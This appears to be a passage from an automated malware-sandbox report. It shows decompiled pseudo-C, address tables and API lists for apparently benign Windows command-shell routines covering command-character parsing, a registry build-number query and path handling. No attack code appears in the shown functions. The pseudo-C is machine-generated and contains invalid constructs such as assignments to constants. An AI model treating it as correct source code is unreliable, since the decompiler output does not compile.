                                              0x002a6934
                                              0x002bbe7c
                                              0x002bbe86
                                              0x00000000
                                              0x002bbe8c
                                              0x002bbe8c
                                              0x002bbe8f
                                              0x00000000
                                              0x002bbe8f
                                              0x00000000
                                              0x002bbe86
                                              0x002a693a
                                              0x002a693a
                                              0x002a693a
                                              0x002a693d
                                              0x002a693d
                                              0x002a6940
                                              0x002a6946
                                              0x002a6946
                                              0x002a6949
                                              0x002a694d
                                              0x002a6950
                                              0x002a6956
                                              0x00000000
                                              0x00000000
                                              0x002a6956
                                              0x002a6934
                                              0x00000000
                                              0x002a6930
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002ADEF9: iswspace.MSVCRT ref: 002ADF07
                                                • Part of subcall function 002ADEF9: wcschr.MSVCRT ref: 002ADF18
                                              • wcschr.MSVCRT ref: 002A6914
                                              • wcschr.MSVCRT ref: 002A6926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswspace
                                              • String ID: &<|>$+: $=,;
                                              • API String ID: 3458554142-2256444845
                                              • Opcode ID: f2ddf0d24968080318698baf7dca95574ba1f6d54c129375d155c2510aa83097
                                              • Instruction ID: c2f919979b875e47449489b21aff400ec5ea71dadeb784b7aa1ffe52d662a2f5
                                              • Opcode Fuzzy Hash: f2ddf0d24968080318698baf7dca95574ba1f6d54c129375d155c2510aa83097
                                              • Instruction Fuzzy Hash: 09212762A64267EBC7348F2688085BEB7E5EFA7350F2C005BE8C597281EF714C64D350
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A4476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002A4476() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t17;
				int _t20;

				_t20 = 4;
				_v16 = _t20;
				if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x2000000,  &_v8) != 0) {
					L5:
					return 0;
				}
				_v12 = _t20;
				_t17 = RegQueryValueExW(_v8, L"UBR", 0,  &_v12,  &_v20,  &_v16);
				RegCloseKey(_v8);
				if(_t17 != 0 || _v12 != _t20) {
					goto L5;
				} else {
					return _v20;
				}
			}









                                              0x002a4481
                                              0x002a4485
                                              0x002a44a2
                                              0x002a44e1
                                              0x00000000
                                              0x002a44e1
                                              0x002a44a8
                                              0x002a44be
                                              0x002a44c9
                                              0x002a44d2
                                              0x00000000
                                              0x002a44d9
                                              0x00000000
                                              0x002a44d9

                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 002A449A
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 002A44BE
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002A44C9
                                              Strings
                                              • UBR, xrefs: 002A44B6
                                              • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 002A4490
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                              • API String ID: 3677997916-3870813718
                                              • Opcode ID: d6be5b05ff35ecf537f88206de3339bb8e671c08839bb11fe31f8c205ae7a772
                                              • Instruction ID: 597cf884bf7df658e30cfea4aa6d9aa12c344c7c9355a49f3af9bd220abecb17
                                              • Opcode Fuzzy Hash: d6be5b05ff35ecf537f88206de3339bb8e671c08839bb11fe31f8c205ae7a772
                                              • Instruction Fuzzy Hash: 33016276E90258BBDF219E95DC4AFEFBBBCEB89710F100156EE01A6140D6709A60DA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 38%
                                              			E002B465D(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t3;
				int _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t18;
				void* _t19;
				signed int _t20;

				_push(__ecx);
				_t3 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t3 ^ _t20;
				_t18 =  *0x2cd5f8; // 0x0
				if(_t18 != 0) {
					L6:
					 *0x2e94b4(0);
					_t6 =  *_t18();
					L7:
					_pop(_t19);
					return E002B6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
				}
				_t8 =  *0x2cd0d0; // 0xffffffff
				if(_t8 != 0xffffffff) {
					L3:
					if(_t8 != 0) {
						_t18 = GetProcAddress(_t8, "SetThreadUILanguage");
						 *0x2cd5f8 = _t18;
					}
					L5:
					if(_t18 == 0) {
						_t6 = SetThreadLocale(0x409);
						goto L7;
					}
					goto L6;
				}
				_t8 = GetModuleHandleW(L"KERNEL32.DLL");
				_t18 =  *0x2cd5f8; // 0x0
				 *0x2cd0d0 = _t8;
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				goto L3;
			}














                                              0x002b4662
                                              0x002b4663
                                              0x002b466a
                                              0x002b466e
                                              0x002b4676
                                              0x002b46bd
                                              0x002b46c1
                                              0x002b46c7
                                              0x002b46c9
                                              0x002b46ce
                                              0x002b46d7
                                              0x002b46d7
                                              0x002b4678
                                              0x002b4680
                                              0x002b469d
                                              0x002b469f
                                              0x002b46ad
                                              0x002b46af
                                              0x002b46af
                                              0x002b46b5
                                              0x002b46b7
                                              0x002be8ad
                                              0x00000000
                                              0x002be8ad
                                              0x00000000
                                              0x002b46b7
                                              0x002b4687
                                              0x002b468d
                                              0x002b4693
                                              0x002b469b
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,002B4533), ref: 002B4687
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,002B4533), ref: 002B46A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1646373207-2530943252
                                              • Opcode ID: 6c22e1c83679adc25f2ffb1f569647d5d79b30dbf6332512c6a39e0bd41a5080
                                              • Instruction ID: 2e50f17263a54c2d3b4f758b0367d3f7d45c6bca21fd3e3c46068a6b89d5b11b
                                              • Opcode Fuzzy Hash: 6c22e1c83679adc25f2ffb1f569647d5d79b30dbf6332512c6a39e0bd41a5080
                                              • Instruction Fuzzy Hash: 9301D630A502169BC710AF38BC8DEA97BA8DB067A8B010366F925DB3E1DB715C518691
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B1F52, Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E002B1F52(void* __ebx, wchar_t* __ecx, wchar_t* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t92;
				void* _t104;
				void* _t108;
				wchar_t* _t110;
				wchar_t** _t111;
				long _t117;
				short* _t118;
				void _t121;
				void* _t123;
				long _t128;
				wchar_t* _t130;
				wchar_t* _t137;
				void* _t146;
				wchar_t** _t155;
				wchar_t** _t158;
				void _t164;
				wchar_t* _t168;
				void _t171;
				intOrPtr _t175;
				long* _t180;
				void* _t188;
				signed int _t191;
				void _t199;
				void* _t203;
				void* _t204;
				wchar_t** _t205;
				long* _t206;
				void* _t207;
				wchar_t* _t209;
				long* _t217;
				void _t218;
				signed int _t220;
				wchar_t* _t223;
				void _t224;
				wchar_t* _t225;
				void* _t226;

				_push(0xc0);
				_push(0x2cbdb8);
				E002B75CC(__ebx, __edi, __esi);
				_t216 = __edx;
				_t223 = __ecx;
				 *(_t226 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t226 - 0xc4)) = __edx;
				_t92 =  *(_t226 + 0xc);
				 *(_t226 - 0xc0) = _t92;
				 *(_t226 - 0xb8) = _t92;
				 *((intOrPtr*)(_t226 - 0xb4)) = 0x90;
				 *((intOrPtr*)(_t226 - 0xb0)) = 5;
				memset(_t226 - 0xac, 0, 0x88);
				 *((intOrPtr*)(_t226 - 0xcc)) = 0;
				_t155 =  *0x2e3cc4;
				_t155[0xc] = 0;
				 *0x2cd0da = 0;
				 *((intOrPtr*)(_t226 - 4)) = 0;
				 *(_t226 - 0xac) =  *(_t226 - 0xc0);
				_push(0x3a);
				if( *0x2e3cc9 == 0) {
					_pop(_t224);
				} else {
					_pop(_t224);
					if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x38)))) == _t224) {
						 *(_t226 - 0xac) =  *(_t155[0x44]);
					}
				}
				if(E002B7797(_t155) == 0) {
					_t157 = 1;
					goto L5;
				} else {
					 *((intOrPtr*)(_t226 - 0xc8)) = 0;
					_t146 =  *0x2ec010(_t226 - 0xb4, _t226 - 0xcc,  &(( *0x2e3cc4)[0xc]), _t216, _t226 - 0xc8);
					_t157 = 1;
					if(_t146 == 1) {
						__eflags =  *((intOrPtr*)(_t226 - 0xc8)) - 1;
						if( *((intOrPtr*)(_t226 - 0xc8)) == 1) {
							_push(0);
							_push(0x4ec);
							E002AC5A2(1);
							_t157 = 1;
							__eflags = 1;
						}
						 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
						L36:
						return E002B7614(0, _t216, _t224);
					}
					L5:
					 *((intOrPtr*)(_t226 - 4)) = 0xfffffffe;
					_t199 =  *(_t226 - 0xc0);
					 *0x2cd0da = _t157;
					_t158 =  *0x2e3cc4;
					_t158[2] = 0;
					 *_t158 = _t216;
					_t97 =  *(_t226 + 8);
					_t158[1] =  *(_t226 + 8);
					if( *0x2e3cc9 == 0) {
						L39:
						__eflags = E002B2D22(_t216, _t97, _t199);
						if(__eflags == 0) {
							goto L9;
						}
						goto L49;
					} else {
						_t137 =  *(_t226 - 0xbc);
						_t235 =  *(_t137[0xe]) - _t224;
						if( *(_t137[0xe]) != _t224) {
							_t97 =  *(_t226 + 8);
							goto L39;
						}
						_t225 = _t158[0x44];
						E002B1040(_t216,  *(_t226 + 8),  *_t225);
						( *0x2e3cc4)[2] = _t225[2];
						L9:
						_t216 = 0x2000;
						E002B2A7C(_t226 - 0xc0, 0x2000, _t235);
						_t224 =  *(_t226 - 0xc0);
						if(_t224 == 0) {
							_push(0);
							L48:
							__imp__??_V@YAXPAX@Z();
							L49:
							goto L36;
						}
						E002B1040(_t224, 0x2000, ( *(_t226 - 0xbc))[0xe]);
						_t164 = _t224;
						_t203 = _t164 + 2;
						do {
							_t104 =  *_t164;
							_t164 = _t164 + 2;
						} while (_t104 != 0);
						_t168 = _t224 + ((_t164 - _t203 >> 1) + 1) * 2;
						 *(_t226 - 0xb8) = _t168;
						 *_t168 = 0;
						_t106 =  *(_t226 - 0xbc);
						if(( *(_t226 - 0xbc))[0xf] != 0) {
							_t216 = 0x2000 - (_t168 - _t224 >> 1);
							E002B1040(_t168, 0x2000, _t106[0xf]);
						}
						E002B2A06(( *0x2e3cc4)[3], _t216);
						_t171 = _t224;
						_t204 = _t171 + 2;
						do {
							_t108 =  *_t171;
							_t171 = _t171 + 2;
						} while (_t108 != 0);
						( *0x2e3cc4)[0x19] = _t171 - _t204 >> 1;
						_t110 = E002ADF40(_t224);
						_t205 =  *0x2e3cc4;
						_t205[0xf] = _t110;
						if(_t110 == 0) {
							L50:
							_push(_t224);
							goto L48;
						}
						_t205[0x23] = _t110;
						_t111 =  &(_t205[0x1a]);
						_t175 = 9;
						 *((intOrPtr*)(_t226 - 0xc4)) = _t175;
						do {
							 *((intOrPtr*)(_t111 - 0x28)) = 0;
							 *_t111 = 0;
							_t111 =  &(_t111[1]);
							_t175 = _t175 - 1;
						} while (_t175 != 0);
						_t216 =  *(_t226 - 0xb8);
						if( *_t216 == 0) {
							_t205[0xe] = 0;
							_t205[0xd] = 0;
							L35:
							_t205[4] =  *0x2e3cd8;
							__imp__??_V@YAXPAX@Z(_t224);
							goto L36;
						}
						_t206 = E002ADF40(_t216 + wcsspn(_t216, L" \t") * 2);
						( *0x2e3cc4)[0xd] = _t206;
						if(_t206 == 0) {
							goto L50;
						}
						_t180 = _t206;
						_t56 =  &(_t180[0]); // 0x2
						_t216 = _t56;
						do {
							_t117 =  *_t180;
							_t180 =  &(_t180[0]);
						} while (_t117 != 0);
						_t118 = _t206 + (_t180 - _t216 >> 1) * 2;
						while(_t118 != _t206) {
							_t191 =  *(_t118 - 2) & 0x0000ffff;
							if(_t191 == 0x20 || _t191 ==  *((intOrPtr*)(_t226 - 0xc4))) {
								_t118 = _t118 + 0xfffffffe;
								continue;
							} else {
								break;
							}
						}
						 *_t118 = 0;
						if( *0x2e3cc9 == 0) {
							_t217 = ( *0x2e3cc4)[0xd];
							while(1) {
								_t207 = 0x2f;
								_t216 = E002AD7D4(_t217, _t207);
								 *(_t226 - 0xb8) = _t216;
								__eflags = _t216;
								if(_t216 == 0) {
									goto L28;
								}
								_t217 =  &(_t216[0]);
								_t128 = towupper( *_t217 & 0x0000ffff);
								__eflags = _t128 - 0x51;
								if(_t128 != 0x51) {
									continue;
								}
								 *0x2cd0c8 = 0;
								_t190 =  *(_t226 - 0xb8);
								_t209 =  *(_t226 - 0xb8);
								 *(_t226 - 0xb8) =  &(_t209[0]);
								do {
									_t130 =  *_t209;
									_t209 =  &(_t209[0]);
									__eflags = _t130;
								} while (_t130 != 0);
								_t90 =  &(_t217[0]); // 0x0
								E002B1040(_t190, (_t209 -  *(_t226 - 0xb8) >> 1) + 1, _t90);
								goto L28;
							}
						}
						L28:
						_t121 = E002AEA40(( *0x2e3cc4)[0xd], 0, 0);
						 *(_t226 - 0xc0) = _t121;
						_t205 =  *0x2e3cc4;
						if( *_t121 == 0) {
							L34:
							_t205[0xe] = _t121;
							goto L35;
						}
						_t216 =  &(_t205[0x1a]);
						 *(_t226 - 0xbc) = _t216;
						_t188 = 1;
						while(_t188 < 0xa) {
							 *(_t216 - 0x28) = _t121;
							_t218 = _t121;
							_t66 = _t218 + 2; // 0x2
							 *(_t226 - 0xb8) = _t66;
							do {
								_t123 =  *_t218;
								_t218 = _t218 + 2;
							} while (_t123 != 0);
							_t220 = _t218 -  *(_t226 - 0xb8) >> 1;
							 *( *(_t226 - 0xbc)) = _t220;
							_t121 =  *(_t226 - 0xc0) + _t220 * 2 + 2;
							 *(_t226 - 0xc0) = _t121;
							_t188 = _t188 + 1;
							_t216 =  &(( *(_t226 - 0xbc))[1]);
							 *(_t226 - 0xbc) = _t216;
							if( *_t121 != 0) {
								continue;
							}
							goto L34;
						}
						goto L34;
					}
				}
			}







































                                              0x002b1f52
                                              0x002b1f57
                                              0x002b1f5c
                                              0x002b1f61
                                              0x002b1f63
                                              0x002b1f65
                                              0x002b1f6b
                                              0x002b1f71
                                              0x002b1f74
                                              0x002b1f7a
                                              0x002b1f80
                                              0x002b1f8a
                                              0x002b1fa3
                                              0x002b1fab
                                              0x002b1fb1
                                              0x002b1fb7
                                              0x002b1fba
                                              0x002b1fc0
                                              0x002b1fc9
                                              0x002b1fcf
                                              0x002b1fd7
                                              0x002bd476
                                              0x002b1fdd
                                              0x002b1fe0
                                              0x002b1fe4
                                              0x002b1fee
                                              0x002b1fee
                                              0x002b1fe4
                                              0x002b1ffb
                                              0x002bd4a4
                                              0x00000000
                                              0x002b2001
                                              0x002b2001
                                              0x002b2026
                                              0x002b202e
                                              0x002b2031
                                              0x002bd47c
                                              0x002bd482
                                              0x002bd484
                                              0x002bd485
                                              0x002bd48a
                                              0x002bd493
                                              0x002bd493
                                              0x002bd493
                                              0x002bd494
                                              0x002b2281
                                              0x002b2286
                                              0x002b2286
                                              0x002b2037
                                              0x002b2037
                                              0x002b203e
                                              0x002b2044
                                              0x002b204a
                                              0x002b2050
                                              0x002b2053
                                              0x002b2055
                                              0x002b2058
                                              0x002b2062
                                              0x002b2294
                                              0x002b229e
                                              0x002b22a0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b2068
                                              0x002b2068
                                              0x002b2071
                                              0x002b2074
                                              0x002b2291
                                              0x00000000
                                              0x002b2291
                                              0x002b207a
                                              0x002b2087
                                              0x002b2095
                                              0x002b2098
                                              0x002b2098
                                              0x002b20a5
                                              0x002b20aa
                                              0x002b20b2
                                              0x002bd4fa
                                              0x002bd4fb
                                              0x002bd4fb
                                              0x002bd502
                                              0x00000000
                                              0x002bd504
                                              0x002b20c5
                                              0x002b20ca
                                              0x002b20cc
                                              0x002b20cf
                                              0x002b20cf
                                              0x002b20d2
                                              0x002b20d5
                                              0x002b20df
                                              0x002b20e2
                                              0x002b20ea
                                              0x002b20ed
                                              0x002b20f7
                                              0x002b2102
                                              0x002b2106
                                              0x002b2106
                                              0x002b2114
                                              0x002b2119
                                              0x002b211b
                                              0x002b211e
                                              0x002b211e
                                              0x002b2121
                                              0x002b2124
                                              0x002b2132
                                              0x002b2137
                                              0x002b213c
                                              0x002b2142
                                              0x002b2147
                                              0x002bd50c
                                              0x002bd50c
                                              0x00000000
                                              0x002bd50c
                                              0x002b214d
                                              0x002b2153
                                              0x002b2158
                                              0x002b2159
                                              0x002b215f
                                              0x002b215f
                                              0x002b2162
                                              0x002b2164
                                              0x002b2167
                                              0x002b2167
                                              0x002b216c
                                              0x002b2175
                                              0x002b22ab
                                              0x002b22ae
                                              0x002b226f
                                              0x002b2274
                                              0x002b2278
                                              0x00000000
                                              0x002b227f
                                              0x002b2191
                                              0x002b2198
                                              0x002b219d
                                              0x00000000
                                              0x00000000
                                              0x002b21a3
                                              0x002b21a5
                                              0x002b21a5
                                              0x002b21a8
                                              0x002b21a8
                                              0x002b21ab
                                              0x002b21ae
                                              0x002b21b7
                                              0x002b21ba
                                              0x002b21be
                                              0x002b21c5
                                              0x002b2289
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b21c5
                                              0x002b21da
                                              0x002b21e3
                                              0x002bd514
                                              0x002bd517
                                              0x002bd519
                                              0x002bd521
                                              0x002bd523
                                              0x002bd529
                                              0x002bd52b
                                              0x00000000
                                              0x00000000
                                              0x002bd531
                                              0x002bd538
                                              0x002bd53f
                                              0x002bd543
                                              0x00000000
                                              0x00000000
                                              0x002bd545
                                              0x002bd54b
                                              0x002bd551
                                              0x002bd556
                                              0x002bd55c
                                              0x002bd55c
                                              0x002bd55f
                                              0x002bd562
                                              0x002bd562
                                              0x002bd56f
                                              0x002bd574
                                              0x00000000
                                              0x002bd574
                                              0x002bd517
                                              0x002b21e9
                                              0x002b21f5
                                              0x002b21fa
                                              0x002b2200
                                              0x002b2209
                                              0x002b226c
                                              0x002b226c
                                              0x00000000
                                              0x002b226c
                                              0x002b220b
                                              0x002b220e
                                              0x002b2216
                                              0x002b2217
                                              0x002b221c
                                              0x002b221f
                                              0x002b2221
                                              0x002b2224
                                              0x002b222a
                                              0x002b222a
                                              0x002b222d
                                              0x002b2230
                                              0x002b223b
                                              0x002b2243
                                              0x002b224e
                                              0x002b2251
                                              0x002b2257
                                              0x002b225e
                                              0x002b2261
                                              0x002b226a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b226a
                                              0x00000000
                                              0x002b2217
                                              0x002b2062

                                              APIs
                                              • memset.MSVCRT ref: 002B1FA3
                                              • wcsspn.MSVCRT ref: 002B2181
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B2278
                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D87
                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D91
                                                • Part of subcall function 002B2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DA4
                                                • Part of subcall function 002B2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DAE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                              • String ID:
                                              • API String ID: 1535828850-0
                                              • Opcode ID: f9a5f5a042dd4bf886fbb5955789868ef4e1b7afbb0dad88729c7a39be6e50a1
                                              • Instruction ID: c42930e8ba7d6b768b178a1ddf0c6c0a138078accdf311d5388a24f116676049
                                              • Opcode Fuzzy Hash: f9a5f5a042dd4bf886fbb5955789868ef4e1b7afbb0dad88729c7a39be6e50a1
                                              • Instruction Fuzzy Hash: 26C1A075A10215CFCB25DF28D894BE9B7B6FF44340F5481AAD50A9B3A1EB309E96CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3B5D, Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E002B3B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E002B00B0(0xffce);
					if(_t87 == 0) {
						L22:
						E002C9287(0xffce);
						__imp__longjmp(0x2db8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E002AC923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E002B00B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0x2e3cec = _t63;
							E002B36CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E002B2D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E002B2349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E002B0D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E002AC923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0x2e3cf0 = _t65;
								 *_t84 = _v556;
								if( *0x2e3cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}



























                                              0x002b3b5d
                                              0x002b3b68
                                              0x002b3b6f
                                              0x002b3b7a
                                              0x002b3b7e
                                              0x002b3b80
                                              0x002b3b8a
                                              0x002b3b8f
                                              0x002b3b91
                                              0x002b3bb7
                                              0x002b3cf0
                                              0x002b3cf2
                                              0x002b3bbd
                                              0x002b3bbf
                                              0x002b3bc5
                                              0x002b3bc9
                                              0x002be009
                                              0x002be009
                                              0x002be015
                                              0x00000000
                                              0x002b3bcf
                                              0x002b3bd1
                                              0x002b3bd3
                                              0x002b3be0
                                              0x002b3be3
                                              0x002b3beb
                                              0x002b3bf1
                                              0x002b3bf8
                                              0x00000000
                                              0x002b3bfe
                                              0x002b3c04
                                              0x002b3c0b
                                              0x002b3c10
                                              0x002b3c15
                                              0x002be01b
                                              0x002be01b
                                              0x002be01b
                                              0x002b3c15
                                              0x002b3bf8
                                              0x002b3c21
                                              0x002b3c2b
                                              0x00000000
                                              0x002b3c31
                                              0x002b3c31
                                              0x002b3c36
                                              0x002be026
                                              0x002be026
                                              0x002b3c3e
                                              0x002b3c3f
                                              0x002b3c48
                                              0x002b3c4c
                                              0x002b3c51
                                              0x002be031
                                              0x002be031
                                              0x002b3c5d
                                              0x002b3c64
                                              0x002b3d10
                                              0x002b3d12
                                              0x002b3d1d
                                              0x002b3c6a
                                              0x002b3c6a
                                              0x002b3c6f
                                              0x002b3c73
                                              0x00000000
                                              0x002b3c79
                                              0x002b3c7b
                                              0x002b3c7f
                                              0x002b3c81
                                              0x002b3c89
                                              0x002b3d22
                                              0x002b3d22
                                              0x002b3c8f
                                              0x002b3c8f
                                              0x002b3c98
                                              0x002b3c9a
                                              0x002b3c9f
                                              0x00000000
                                              0x00000000
                                              0x002b3ca1
                                              0x002b3ca1
                                              0x002b3ca7
                                              0x00000000
                                              0x002b3ca9
                                              0x002b3cab
                                              0x002b3caf
                                              0x00000000
                                              0x00000000
                                              0x002b3caf
                                              0x00000000
                                              0x002b3ca7
                                              0x002be03c
                                              0x00000000
                                              0x002be03c
                                              0x002b3c89
                                              0x002b3cb1
                                              0x002b3cba
                                              0x002b3cc2
                                              0x002b3cce
                                              0x002b3cd6
                                              0x002b3cd6
                                              0x002b3cde
                                              0x002b3ce4
                                              0x002b3cee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b3cee
                                              0x002b3c73
                                              0x002b3c64
                                              0x002b3c2b
                                              0x002b3cf6
                                              0x002b3d0f

                                              APIs
                                              • memset.MSVCRT ref: 002B3B91
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B3CF6
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • longjmp.MSVCRT(002DB8B8,00000001,-00000001,00000000,?,00000000), ref: 002BE015
                                                • Part of subcall function 002AC923: _wcsicmp.MSVCRT ref: 002AC9CF
                                                • Part of subcall function 002AC923: _wcsicmp.MSVCRT ref: 002AC9E5
                                                • Part of subcall function 002AC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 002ACA04
                                                • Part of subcall function 002AC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002ACA15
                                                • Part of subcall function 002B36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,002A590A,00000000), ref: 002B36F0
